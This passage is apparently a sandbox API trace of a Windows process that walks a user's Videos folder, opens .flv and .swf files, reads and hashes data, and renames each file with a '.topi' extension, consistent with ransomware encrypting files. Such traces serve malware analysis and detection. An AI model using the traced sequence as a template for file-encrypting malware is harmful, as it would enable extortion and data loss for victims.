RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4e38 [0097.376] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a30 [0097.376] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0097.376] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.377] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.377] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.377] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\oh26YTG5TwCV3.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\oh26ytg5twcv3.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\oh26YTG5TwCV3.swf.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\oh26ytg5twcv3.swf.topi")) returned 1 [0097.381] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.381] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.382] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.382] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\HBcE7 BrxksR8J\\") returned="HBcE7 BrxksR8J\\" [0097.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.382] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\") returned="_tGjm1G\\" [0097.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb988 [0097.382] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0097.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb4a0 [0097.382] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0097.382] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.382] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.382] PathFindFileNameW (pszPath="") returned="" [0097.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.382] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\HBcE7 BrxksR8J\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9350faf0, ftCreationTime.dwHighDateTime=0x1d5b5df, ftLastAccessTime.dwLowDateTime=0x75c7a00, ftLastAccessTime.dwHighDateTime=0x1d5bea5, ftLastWriteTime.dwLowDateTime=0x75c7a00, ftLastWriteTime.dwHighDateTime=0x1d5bea5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0097.382] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\HBcE7 BrxksR8J\\mhN3IHxCeb7qAdOPRJ.flv") returned=".flv" [0097.382] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\HBcE7 BrxksR8J\\mhN3IHxCeb7qAdOPRJ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_tgjm1g\\hbce7 brxksr8j\\mhn3ihxceb7qadoprj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.383] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=66481) returned 1 [0097.383] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.385] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x1038b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.385] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.386] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.387] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df4d0) returned 1 [0097.388] CryptCreateHash (in: hProv=0x6df4d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.388] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.388] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.388] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.388] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.388] GetLastError () returned 0x0 [0097.388] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.388] CryptReleaseContext (hProv=0x6df4d0, dwFlags=0x0) returned 1 [0097.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.388] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.388] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.388] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.388] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.388] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.388] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x103b0) returned 0x9a06a00 [0097.388] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.388] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.388] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb4a0 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4dd8 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb4e8 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4df0 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e20 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e38 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.389] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e20 | out: hHeap=0x680000) returned 1 [0097.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e38 | out: hHeap=0x680000) returned 1 [0097.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4e38 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4e20 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e38 | out: hHeap=0x680000) returned 1 [0097.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e20 | out: hHeap=0x680000) returned 1 [0097.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.390] GetCurrentThreadId () returned 0x8c4 [0097.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f9920 [0097.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.390] GetCurrentThreadId () returned 0x8c4 [0097.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.390] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e20 [0097.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e38 [0097.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e08 [0097.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4e50 [0097.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e49d0 [0097.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.392] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.392] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.392] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\HBcE7 BrxksR8J\\mhN3IHxCeb7qAdOPRJ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_tgjm1g\\hbce7 brxksr8j\\mhn3ihxceb7qadoprj.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\HBcE7 BrxksR8J\\mhN3IHxCeb7qAdOPRJ.flv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_tgjm1g\\hbce7 brxksr8j\\mhn3ihxceb7qadoprj.flv.topi")) returned 1 [0097.393] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.393] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.393] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.394] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0097.394] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bb97b0, ftCreationTime.dwHighDateTime=0x1d5c448, ftLastAccessTime.dwLowDateTime=0x19644140, ftLastAccessTime.dwHighDateTime=0x1d5bbf5, ftLastWriteTime.dwLowDateTime=0x19644140, ftLastWriteTime.dwHighDateTime=0x1d5bbf5, nFileSizeHigh=0x0, nFileSizeLow=0xa4b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xK14nQb8WZ0.swf", cAlternateFileName="XK14NQ~1.SWF")) returned 1 [0097.394] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\HBcE7 BrxksR8J\\xK14nQb8WZ0.swf") returned=".swf" [0097.395] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\HBcE7 BrxksR8J\\xK14nQb8WZ0.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_tgjm1g\\hbce7 brxksr8j\\xk14nqb8wz0.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.395] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=42166) returned 1 [0097.395] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.398] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xa490, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.398] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.399] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df4d0) returned 1 [0097.400] CryptCreateHash (in: hProv=0x6df4d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.400] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.400] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.400] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.400] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.400] GetLastError () returned 0x0 [0097.400] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.400] CryptReleaseContext (hProv=0x6df4d0, dwFlags=0x0) returned 1 [0097.400] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.400] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.400] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.400] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.400] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.400] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.400] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.400] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa4c0) returned 0x9a06a00 [0097.401] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.401] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb4e8 [0097.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4df0 [0097.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb530 [0097.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e08 [0097.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e38 [0097.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e50 [0097.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.401] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.401] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e38 | out: hHeap=0x680000) returned 1 [0097.401] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e50 | out: hHeap=0x680000) returned 1 [0097.401] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.401] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.401] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0097.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4e50 [0097.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4e38 [0097.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0097.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 